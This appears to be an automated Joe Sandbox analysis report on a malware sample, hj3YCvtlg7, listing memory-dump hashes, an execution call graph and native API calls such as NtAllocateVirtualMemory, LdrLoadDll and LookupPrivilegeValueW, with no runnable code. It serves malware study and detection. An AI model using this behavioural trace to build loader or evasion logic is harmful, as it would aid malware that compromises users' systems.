                                                                                              • Instruction Fuzzy Hash: EFF0C2310043849EE7508A0ACD84B63FFE8EF41624F18C49BED480A286D2799844CBB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8d23ef5a5ed380a9b42400f624d103dd43b15fa137b3e5f8ef3968f8994c2b80
                                                                                              • Instruction ID: 8b93cf18eb2431290a4255fae3dcd429e2f4b073d54b0966a7b3c0384046a8b5
                                                                                              • Opcode Fuzzy Hash: 8d23ef5a5ed380a9b42400f624d103dd43b15fa137b3e5f8ef3968f8994c2b80
                                                                                              • Instruction Fuzzy Hash: 3DA15C36E002068FCF05DFB4C44459EBBB2BF85B00B2585AEE906AB261DB31D916CF41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1356964784.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1356812219.00000000072D0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_72d0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4ff6ed2e19a85a4ee175c45e5dbffbdcf16a6c015bf25826803e98168fa07dcb
                                                                                              • Instruction ID: 6abdc640e95dfe58b77513849364592c986aefb1b2140235e33d643a7235a16f
                                                                                              • Opcode Fuzzy Hash: 4ff6ed2e19a85a4ee175c45e5dbffbdcf16a6c015bf25826803e98168fa07dcb
                                                                                              • Instruction Fuzzy Hash: 780179B1E15A189BFB1CCF6B8C0069FFAF7AFC9200F08C179891C6A264EB7415458E55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:1.5%
                                                                                              Dynamic/Decrypted Code Coverage:2.9%
                                                                                              Signature Coverage:5.9%
                                                                                              Total number of Nodes:560
                                                                                              Total number of Limit Nodes:72
                                                                                              execution_graph 95870 41f120 95873 41b970 95870->95873 95874 41b996 95873->95874 95881 409d40 95874->95881 95876 41b9a2 95880 41b9c3 95876->95880 95889 40c1c0 95876->95889 95878 41b9b5 95925 41a6b0 95878->95925 95928 409c90 95881->95928 95883 409d4d 95884 409d54 95883->95884 95940 409c30 95883->95940 95884->95876 95890 40c1e5 95889->95890 96360 40b1c0 95890->96360 95892 40c23c 96364 40ae40 95892->96364 95894 40c4b3 95894->95878 95895 40c262 95895->95894 96373 4143a0 95895->96373 95897 40c2a7 95897->95894 96376 408a60 95897->96376 95899 40c2eb 95899->95894 96383 41a500 95899->96383 95903 40c341 95904 40c348 95903->95904 96396 41a010 95903->96396 95905 41bdc0 2 API calls 95904->95905 95907 40c355 95905->95907 95907->95878 95909 40c392 95910 41bdc0 2 API calls 95909->95910 95911 40c399 95910->95911 95911->95878 95912 40c3a2 95913 40f4a0 3 API calls 95912->95913 95914 40c416 95913->95914 95914->95904 95915 40c421 95914->95915 95916 41bdc0 2 API calls 95915->95916 95917 40c445 95916->95917 96401 41a060 95917->96401 95920 41a010 2 API calls 95921 40c480 95920->95921 95921->95894 96406 419e20 95921->96406 95924 41a6b0 2 API calls 95924->95894 95926 41a6cf ExitProcess 95925->95926 95927 41af60 LdrLoadDll 95925->95927 95927->95926 95960 418bc0 95928->95960 95932 409cb6 95932->95883 95933 409cac 95933->95932 95967 41b2b0 95933->95967 95935 409cf3 95935->95932 95978 409ab0 95935->95978 95937 409d13 95984 409620 LdrLoadDll 95937->95984 95939 409d25 95939->95883 95941 409c40 95940->95941 96335 41b5a0 95941->96335 95944 41b5a0 LdrLoadDll 95945 409c5b 95944->95945 95946 41b5a0 LdrLoadDll 95945->95946 95947 409c71 95946->95947 95948 40f180 95947->95948 95949 40f199 95948->95949 96343 40b040 95949->96343 95951 40f1ac 96347 41a1e0 95951->96347 95954 409d65 95954->95876 95956 40f1d2 95957 40f1fd 95956->95957 96353 41a260 95956->96353 95959 41a490 2 API calls 95957->95959 95959->95954 95961 418bcf 95960->95961 95985 414e50 95961->95985 95963 409ca3 95964 418a70 95963->95964 95991 41a600 95964->95991 95968 41b2c9 95967->95968 95998 414a50 95968->95998 95970 41b2e1 95971 41b2ea 95970->95971 96037 41b0f0 95970->96037 95971->95935 95973 41b2fe 95973->95971 96055 419f00 95973->96055 95981 409aca 95978->95981 96313 407ea0 95978->96313 95980 409ad1 95980->95937 95981->95980 96326 408160 95981->96326 95984->95939 95986 414e6a 95985->95986 95987 414e5e 95985->95987 95986->95963 95987->95986 95990 4152d0 LdrLoadDll 95987->95990 95989 414fbc 95989->95963 95990->95989 95994 41af60 95991->95994 95993 418a85 95993->95933 95995 41af70 95994->95995 95997 41af92 95994->95997 95996 414e50 LdrLoadDll 95995->95996 95996->95997 95997->95993 95999 414d85 95998->95999 96000 414a64 95998->96000 95999->95970 96000->95999 96063 419c50 96000->96063 96003 414b90 96066 41a360 96003->96066 96004 414b73 96123 41a460 LdrLoadDll 96004->96123 96007 414b7d 96007->95970 96008 414bb7 96009 41bdc0 2 API calls 96008->96009 96011 414bc3 96009->96011 96010 414d49 96013 41a490 2 API calls 96010->96013 96011->96007 96011->96010 96012 414d5f 96011->96012 96017 414c52 96011->96017 96132 414790 LdrLoadDll NtReadFile NtClose 96012->96132 96014 414d50 96013->96014 96014->95970 96016 414d72 96016->95970 96018 414cb9 96017->96018 96019 414c61 96017->96019 96018->96010 96020 414ccc 96018->96020 96021 414c66 96019->96021 96022 414c7a 96019->96022 96125 41a2e0 96020->96125 96124 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 96021->96124 96026 414c97 96022->96026 96027 414c7f 96022->96027 96026->96014 96081 414410 96026->96081 96069 4146f0 96027->96069 96029 414c70 96029->95970 96031 414d2c 96129 41a490 96031->96129 96032 414c8d 96032->95970 96035 414caf 96035->95970 96036 414d38 96036->95970 96038 41b101 96037->96038 96039 41b113 96038->96039 96150 41bd40 96038->96150 96039->95973 96041 41b134 96153 414070 96041->96153 96043 41b180 96043->95973 96044 41b157 96044->96043 96045 414070 3 API calls 96044->96045 96047 41b179 96045->96047 96047->96043 96185 415390 96047->96185 96048 41b20a 96050 41b21a 96048->96050 96279 41af00 LdrLoadDll 96048->96279 96195 41ad70 96050->96195 96052 41b248 96274 419ec0 96052->96274 96056 419f1c 96055->96056 96057 41af60 LdrLoadDll 96055->96057 96307 1762c0a 96056->96307 96057->96056 96058 419f37 96060 41bdc0 96058->96060 96310 41a670 96060->96310 96062 41b359 96062->95935 96064 414b44 96063->96064 96065 41af60 LdrLoadDll 96063->96065 96064->96003 96064->96004 96064->96007 96065->96064 96067 41a37c NtCreateFile 96066->96067 96068 41af60 LdrLoadDll 96066->96068 96067->96008 96068->96067 96070 41470c 96069->96070 96071 41a2e0 LdrLoadDll 96070->96071 96072 41472d 96071->96072 96073 414734 96072->96073 96074 414748 96072->96074 96075 41a490 2 API calls 96073->96075 96076 41a490 2 API calls 96074->96076 96077 41473d 96075->96077 96078 414751 96076->96078 96077->96032 96133 41bfd0 LdrLoadDll RtlAllocateHeap 96078->96133 96080 41475c 96080->96032 96082 41445b 96081->96082 96083 41448e 96081->96083 96084 41a2e0 LdrLoadDll 96082->96084 96085 4145d9 96083->96085 96088 4144aa 96083->96088 96087 414476 96084->96087 96086 41a2e0 LdrLoadDll 96085->96086 96093 4145f4 96086->96093 96089 41a490 2 API calls 96087->96089 96090 41a2e0 LdrLoadDll 96088->96090 96091 41447f 96089->96091 96092 4144c5 96090->96092 96091->96035 96095 4144e1 96092->96095 96096 4144cc 96092->96096 96146 41a320 LdrLoadDll 96093->96146 96099 4144e6 96095->96099 96100 4144fc 96095->96100 96098 41a490 2 API calls 96096->96098 96097 41462e 96101 41a490 2 API calls 96097->96101 96102 4144d5 96098->96102 96103 41a490 2 API calls 96099->96103 96108 414501 96100->96108 96134 41bf90 96100->96134 96104 414639 96101->96104 96102->96035 96105 4144ef 96103->96105 96104->96035 96105->96035 96116 414513 96108->96116 96137 41a410 96108->96137 96109 414567 96110 41457e 96109->96110 96145 41a2a0 LdrLoadDll 96109->96145 96112 414585 96110->96112 96113 41459a 96110->96113 96115 41a490 2 API calls 96112->96115 96114 41a490 2 API calls 96113->96114 96118 4145a3 96114->96118 96115->96116 96116->96035 96117 4145cf 96117->96035 96118->96117 96140 41bb90 96118->96140 96120 4145ba 96121 41bdc0 2 API calls 96120->96121 96122 4145c3 96121->96122 96122->96035 96123->96007 96124->96029 96126 41af60 LdrLoadDll 96125->96126 96127 414d14 96126->96127 96128 41a320 LdrLoadDll 96127->96128 96128->96031 96130 41af60 LdrLoadDll 96129->96130 96131 41a4ac NtClose 96130->96131 96131->96036 96132->96016 96133->96080 96136 41bfa8 96134->96136 96147 41a630 96134->96147 96136->96108 96138 41a42c NtReadFile 96137->96138 96139 41af60 LdrLoadDll 96137->96139 96138->96109 96139->96138 96141 41bbb4 96140->96141 96142 41bb9d 96140->96142 96141->96120 96142->96141 96143 41bf90 2 API calls 96142->96143 96144 41bbcb 96143->96144 96144->96120 96145->96110 96146->96097 96148 41af60 LdrLoadDll 96147->96148 96149 41a64c RtlAllocateHeap 96148->96149 96149->96136 96280 41a540 96150->96280 96152 41bd6d 96152->96041 96154 414081 96153->96154 96155 414089 96153->96155 96154->96044 96184 41435c 96155->96184 96283 41cf30 96155->96283 96157 4140dd 96158 41cf30 2 API calls 96157->96158 96161 4140e8 96158->96161 96159 414136 96162 41cf30 2 API calls 96159->96162 96161->96159 96163 41d060 3 API calls 96161->96163 96294 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 96161->96294 96165 41414a 96162->96165 96163->96161 96164 4141a7 96166 41cf30 2 API calls 96164->96166 96165->96164 96288 41d060 96165->96288 96171 4141bd 96166->96171 96168 4141fa 96169 41cf30 2 API calls 96168->96169 96173 414205 96169->96173 96170 41d060 3 API calls 96170->96171 96171->96168 96171->96170 96172 41d060 3 API calls 96172->96173 96173->96172 96179 41423f 96173->96179 96175 414334 96296 41cf90 LdrLoadDll RtlFreeHeap 96175->96296 96177 41433e 96297 41cf90 LdrLoadDll RtlFreeHeap 96177->96297 96295 41cf90 LdrLoadDll RtlFreeHeap 96179->96295 96180 414348 96298 41cf90 LdrLoadDll RtlFreeHeap 96180->96298 96182 414352 96299 41cf90 LdrLoadDll RtlFreeHeap 96182->96299 96184->96044 96186 4153a1 96185->96186 96187 414a50 8 API calls 96186->96187 96188 4153b7 96187->96188 96189 4153f2 96188->96189 96190 415405 96188->96190 96194 41540a 96188->96194 96191 41bdc0 2 API calls 96189->96191 96192 41bdc0 2 API calls 96190->96192 96193 4153f7 96191->96193 96192->96194 96193->96048 96194->96048 96300 41ac30 96195->96300 96198 41ac30 LdrLoadDll 96199 41ad8d 96198->96199 96200 41ac30 LdrLoadDll 96199->96200 96201 41ad96 96200->96201 96202 41ac30 LdrLoadDll 96201->96202 96203 41ad9f 96202->96203 96204 41ac30 LdrLoadDll 96203->96204 96205 41ada8 96204->96205 96206 41ac30 LdrLoadDll 96205->96206 96207 41adb1 96206->96207 96208 41ac30 LdrLoadDll 96207->96208 96209 41adbd 96208->96209 96210 41ac30 LdrLoadDll 96209->96210 96211 41adc6 96210->96211 96212 41ac30 LdrLoadDll 96211->96212 96213 41adcf 96212->96213 96214 41ac30 LdrLoadDll 96213->96214 96215 41add8 96214->96215 96216 41ac30 LdrLoadDll 96215->96216 96217 41ade1 96216->96217 96218 41ac30 LdrLoadDll 96217->96218 96219 41adea 96218->96219 96220 41ac30 LdrLoadDll 96219->96220 96221 41adf6 96220->96221 96222 41ac30 LdrLoadDll 96221->96222 96223 41adff 96222->96223 96224 41ac30 LdrLoadDll 96223->96224 96225 41ae08 96224->96225 96226 41ac30 LdrLoadDll 96225->96226 96227 41ae11 96226->96227 96228 41ac30 LdrLoadDll 96227->96228 96229 41ae1a 96228->96229 96230 41ac30 LdrLoadDll 96229->96230 96231 41ae23 96230->96231 96232 41ac30 LdrLoadDll 96231->96232 96233 41ae2f 96232->96233 96234 41ac30 LdrLoadDll 96233->96234 96235 41ae38 96234->96235 96236 41ac30 LdrLoadDll 96235->96236 96237 41ae41 96236->96237 96238 41ac30 LdrLoadDll 96237->96238 96239 41ae4a 96238->96239 96240 41ac30 LdrLoadDll 96239->96240 96241 41ae53 96240->96241 96242 41ac30 LdrLoadDll 96241->96242 96243 41ae5c 96242->96243 96244 41ac30 LdrLoadDll 96243->96244 96245 41ae68 96244->96245 96246 41ac30 LdrLoadDll 96245->96246 96247 41ae71 96246->96247 96248 41ac30 LdrLoadDll 96247->96248 96249 41ae7a 96248->96249 96250 41ac30 LdrLoadDll 96249->96250 96251 41ae83 96250->96251 96252 41ac30 LdrLoadDll 96251->96252 96253 41ae8c 96252->96253 96254 41ac30 LdrLoadDll 96253->96254 96255 41ae95 96254->96255 96256 41ac30 LdrLoadDll 96255->96256 96257 41aea1 96256->96257 96258 41ac30 LdrLoadDll 96257->96258 96259 41aeaa 96258->96259 96260 41ac30 LdrLoadDll 96259->96260 96261 41aeb3 96260->96261 96262 41ac30 LdrLoadDll 96261->96262 96263 41aebc 96262->96263 96264 41ac30 LdrLoadDll 96263->96264 96265 41aec5 96264->96265 96266 41ac30 LdrLoadDll 96265->96266 96267 41aece 96266->96267 96268 41ac30 LdrLoadDll 96267->96268 96269 41aeda 96268->96269 96270 41ac30 LdrLoadDll 96269->96270 96271 41aee3 96270->96271 96272 41ac30 LdrLoadDll 96271->96272 96273 41aeec 96272->96273 96273->96052 96275 41af60 LdrLoadDll 96274->96275 96276 419edc 96275->96276 96306 1762df0 LdrInitializeThunk 96276->96306 96277 419ef3 96277->95973 96279->96050 96281 41af60 LdrLoadDll 96280->96281 96282 41a55c NtAllocateVirtualMemory 96281->96282 96282->96152 96284 41cf40 96283->96284 96285 41cf46 96283->96285 96284->96157 96286 41bf90 2 API calls 96285->96286 96287 41cf6c 96286->96287 96287->96157 96289 41cfd0 96288->96289 96290 41bf90 2 API calls 96289->96290 96292 41d02d 96289->96292 96291 41d00a 96290->96291 96293 41bdc0 2 API calls 96291->96293 96292->96165 96293->96292 96294->96161 96295->96175 96296->96177 96297->96180 96298->96182 96299->96184 96301 41ac4b 96300->96301 96302 414e50 LdrLoadDll 96301->96302 96303 41ac6b 96302->96303 96304 414e50 LdrLoadDll 96303->96304 96305 41ad17 96303->96305 96304->96305 96305->96198 96306->96277 96308 1762c11 96307->96308 96309 1762c1f LdrInitializeThunk 96307->96309 96308->96058 96309->96058 96311 41a68c RtlFreeHeap 96310->96311 96312 41af60 LdrLoadDll 96310->96312 96311->96062 96312->96311 96314 407eb0 96313->96314 96315 407eab 96313->96315 96316 41bd40 2 API calls 96314->96316 96315->95981 96325 407ed5 96316->96325 96317 407f38 96317->95981 96318 419ec0 2 API calls 96318->96325 96319 407f3e 96320 407f64 96319->96320 96322 41a5c0 2 API calls 96319->96322 96320->95981 96323 407f55 96322->96323 96323->95981 96324 41bd40 2 API calls 96324->96325 96325->96317 96325->96318 96325->96319 96325->96324 96329 41a5c0 96325->96329 96327 40817e 96326->96327 96328 41a5c0 2 API calls 96326->96328 96327->95937 96328->96327 96330 41af60 LdrLoadDll 96329->96330 96331 41a5dc 96330->96331 96334 1762c70 LdrInitializeThunk 96331->96334 96332 41a5f3 96332->96325 96334->96332 96336 41b5c3 96335->96336 96339 40acf0 96336->96339 96340 40ad14 96339->96340 96341 40ad50 LdrLoadDll 96340->96341 96342 409c4a 96340->96342 96341->96342 96342->95944 96344 40b063 96343->96344 96346 40b0e0 96344->96346 96358 419c90 LdrLoadDll 96344->96358 96346->95951 96348 41af60 LdrLoadDll 96347->96348 96349 40f1bb 96348->96349 96349->95954 96350 41a7d0 96349->96350 96351 41a7ef LookupPrivilegeValueW 96350->96351 96352 41af60 LdrLoadDll 96350->96352 96351->95956 96352->96351 96354 41a27c 96353->96354 96355 41af60 LdrLoadDll 96353->96355 96359 1762ea0 LdrInitializeThunk 96354->96359 96355->96354 96356 41a29b 96356->95957 96358->96346 96359->96356 96361 40b1f0 96360->96361 96362 40b040 LdrLoadDll 96361->96362 96363 40b204 96362->96363 96363->95892 96365 40ae4d 96364->96365 96366 40ae51 96364->96366 96365->95895 96367 40ae6a 96366->96367 96368 40ae9c 96366->96368 96411 419cd0 LdrLoadDll 96367->96411 96412 419cd0 LdrLoadDll 96368->96412 96370 40aead 96370->95895 96372 40ae8c 96372->95895 96374 40f4a0 3 API calls 96373->96374 96375 4143c6 96374->96375 96375->95897 96413 4087a0 96376->96413 96379 408a9d 96379->95899 96380 4087a0 20 API calls 96381 408a8a 96380->96381 96381->96379 96431 40f710 10 API calls 96381->96431 96384 41a501 96383->96384 96385 41af60 LdrLoadDll 96384->96385 96386 41a51c 96385->96386 96554 1762e80 LdrInitializeThunk 96386->96554 96387 40c322 96389 40f4a0 96387->96389 96390 40f4bd 96389->96390 96555 419fc0 96390->96555 96393 40f505 96393->95903 96394 41a010 2 API calls 96395 40f52e 96394->96395 96395->95903 96397 41a02c 96396->96397 96398 41af60 LdrLoadDll 96396->96398 96561 1762d10 LdrInitializeThunk 96397->96561 96398->96397 96399 40c385 96399->95909 96399->95912 96402 41af60 LdrLoadDll 96401->96402 96403 41a07c 96402->96403 96562 1762d30 LdrInitializeThunk 96403->96562 96404 40c459 96404->95920 96407 41af60 LdrLoadDll 96406->96407 96408 419e3c 96407->96408 96563 1762fb0 LdrInitializeThunk 96408->96563 96409 40c4ac 96409->95924 96411->96372 96412->96370 96414 407ea0 4 API calls 96413->96414 96421 4087ba 96413->96421 96414->96421 96415 408a49 96415->96379 96415->96380 96416 408a3f 96417 408160 2 API calls 96416->96417 96417->96415 96420 419f00 2 API calls 96420->96421 96421->96415 96421->96416 96421->96420 96423 41a490 LdrLoadDll NtClose 96421->96423 96426 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96421->96426 96429 419e20 2 API calls 96421->96429 96432 419d10 96421->96432 96435 4085d0 96421->96435 96447 40f5f0 LdrLoadDll NtClose 96421->96447 96448 419d90 LdrLoadDll 96421->96448 96449 419dc0 LdrLoadDll 96421->96449 96450 419e50 LdrLoadDll 96421->96450 96451 4083a0 96421->96451 96467 405f60 LdrLoadDll 96421->96467 96423->96421 96426->96421 96429->96421 96431->96379 96433 41af60 LdrLoadDll 96432->96433 96434 419d2c 96433->96434 96434->96421 96436 4085e6 96435->96436 96468 419880 96436->96468 96438 408771 96438->96421 96439 4085ff 96439->96438 96489 4081a0 96439->96489 96441 4086e5 96441->96438 96442 4083a0 11 API calls 96441->96442 96443 408713 96442->96443 96443->96438 96444 419f00 2 API calls 96443->96444 96445 408748 96444->96445 96445->96438 96446 41a500 2 API calls 96445->96446 96446->96438 96447->96421 96448->96421 96449->96421 96450->96421 96452 4083c9 96451->96452 96533 408310 96452->96533 96455 4083dc 96456 41a500 2 API calls 96455->96456 96457 408467 96455->96457 96460 408462 96455->96460 96541 40f670 96455->96541 96456->96455 96457->96421 96458 41a490 2 API calls 96459 40849a 96458->96459 96459->96457 96461 419d10 LdrLoadDll 96459->96461 96460->96458 96462 4084ff 96461->96462 96462->96457 96545 419d50 96462->96545 96464 408563 96464->96457 96465 414a50 8 API calls 96464->96465 96466 4085b8 96465->96466 96466->96421 96467->96421 96469 41bf90 2 API calls 96468->96469 96470 419897 96469->96470 96496 409310 96470->96496 96472 4198b2 96473 4198f0 96472->96473 96474 4198d9 96472->96474 96477 41bd40 2 API calls 96473->96477 96475 41bdc0 2 API calls 96474->96475 96476 4198e6 96475->96476 96476->96439 96478 41992a 96477->96478 96479 41bd40 2 API calls 96478->96479 96481 419943 96479->96481 96486 419be4 96481->96486 96502 41bd80 96481->96502 96483 419bd0 96484 41bdc0 2 API calls 96483->96484 96485 419bda 96484->96485 96485->96439 96487 41bdc0 2 API calls 96486->96487 96488 419c39 96487->96488 96488->96439 96490 40829f 96489->96490 96491 4081b5 96489->96491 96490->96441 96491->96490 96492 414a50 8 API calls 96491->96492 96493 408222 96492->96493 96494 41bdc0 2 API calls 96493->96494 96495 408249 96493->96495 96494->96495 96495->96441 96497 409335 96496->96497 96498 40acf0 LdrLoadDll 96497->96498 96499 409368 96498->96499 96501 40938d 96499->96501 96505 40cf20 96499->96505 96501->96472 96526 41a580 96502->96526 96506 40cf4c 96505->96506 96507 41a1e0 LdrLoadDll 96506->96507 96508 40cf65 96507->96508 96509 40cf6c 96508->96509 96516 41a220 96508->96516 96509->96501 96511 40cf8f 96511->96509 96523 41a810 LdrLoadDll 96511->96523 96513 40cfa7 96514 41a490 2 API calls 96513->96514 96515 40cfca 96514->96515 96515->96501 96517 41a23c 96516->96517 96518 41af60 LdrLoadDll 96516->96518 96524 1762ca0 LdrInitializeThunk 96517->96524 96518->96517 96519 41a257 96519->96511 96525 1762ea0 LdrInitializeThunk 96519->96525 96520 41a29b 96520->96511 96523->96513 96524->96519 96525->96520 96527 41a596 96526->96527 96528 41af60 LdrLoadDll 96527->96528 96529 41a59c 96528->96529 96532 1762f90 LdrInitializeThunk 96529->96532 96530 419bc9 96530->96483 96530->96486 96532->96530 96534 408328 96533->96534 96535 40acf0 LdrLoadDll 96534->96535 96536 408343 96535->96536 96537 414e50 LdrLoadDll 96536->96537 96538 408353 96537->96538 96539 40835c PostThreadMessageW 96538->96539 96540 408370 96538->96540 96539->96540 96540->96455 96542 40f683 96541->96542 96548 419e90 96542->96548 96546 419d6c 96545->96546 96547 41af60 LdrLoadDll 96545->96547 96546->96464 96547->96546 96549 419eac 96548->96549 96550 41af60 LdrLoadDll 96548->96550 96553 1762dd0 LdrInitializeThunk 96549->96553 96550->96549 96551 40f6ae 96551->96455 96553->96551 96554->96387 96556 41af60 LdrLoadDll 96555->96556 96557 419fdc 96556->96557 96560 1762f30 LdrInitializeThunk 96557->96560 96558 40f4fe 96558->96393 96558->96394 96560->96558 96561->96399 96562->96404 96563->96409 96567 1762ad0 LdrInitializeThunk

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 41a410-41a426 1 41a42c-41a459 NtReadFile 0->1 2 41a427 call 41af60 0->2 2->1
                                                                                              APIs
                                                                                              • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID: 1JA$rMA$rMA
                                                                                              • API String ID: 2738559852-782607585
                                                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                              • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                              • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 3 41a40b-41a459 call 41af60 NtReadFile
                                                                                              APIs
                                                                                              • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID: 1JA$rMA$rMA
                                                                                              • API String ID: 2738559852-782607585
                                                                                              • Opcode ID: 40296086b2c65b8e1281a00ba7c399c1232ea7f1d97edca416a916e4757591c9
                                                                                              • Instruction ID: 9b28a46ab4fa2a32d5bfb7c5fd36816b9b2bf06c9a4a590c0aa8104f95e36be6
                                                                                              • Opcode Fuzzy Hash: 40296086b2c65b8e1281a00ba7c399c1232ea7f1d97edca416a916e4757591c9
                                                                                              • Instruction Fuzzy Hash: 9BF01DB2114049AFCB04DF99D880CEBB7ADEF8C218B15864DF95C97201C630E855CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 204 41a53a-41a53b 205 41a501-41a539 call 41af60 call 1762e80 204->205 206 41a53d-41a53f 204->206 207 41a541-41a556 206->207 208 41a596-41a5b9 call 41af60 call 1762f90 206->208 210 41a55c-41a57d NtAllocateVirtualMemory 207->210 211 41a557 call 41af60 207->211 211->210
                                                                                              APIs
                                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateMemoryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 2167126740-0
                                                                                              • Opcode ID: 3abcdc1be25a100d8e90c82018335ced6614c48c47a8e34b9972859f4df0c279
                                                                                              • Instruction ID: 21f0199be098d254c0e1f8a28cd9adb607e2c9389512d22ae25e752f30171257
                                                                                              • Opcode Fuzzy Hash: 3abcdc1be25a100d8e90c82018335ced6614c48c47a8e34b9972859f4df0c279
                                                                                              • Instruction Fuzzy Hash: 312147B2200208AFCB18DF88DC85EEB77ADEF8C754F148519BE0897241C634E861CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 249 40acf0-40ad19 call 41cc50 252 40ad1b-40ad1e 249->252 253 40ad1f-40ad2d call 41d070 249->253 256 40ad3d-40ad4e call 41b4a0 253->256 257 40ad2f-40ad3a call 41d2f0 253->257 262 40ad50-40ad64 LdrLoadDll 256->262 263 40ad67-40ad6a 256->263 257->256 262->263
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID:
                                                                                              • API String ID: 2234796835-0
                                                                                              • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                              • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                                                              • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                              • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 264 41a360-41a376 265 41a37c-41a3b1 NtCreateFile 264->265 266 41a377 call 41af60 264->266 266->265
                                                                                              APIs
                                                                                              • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                              • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
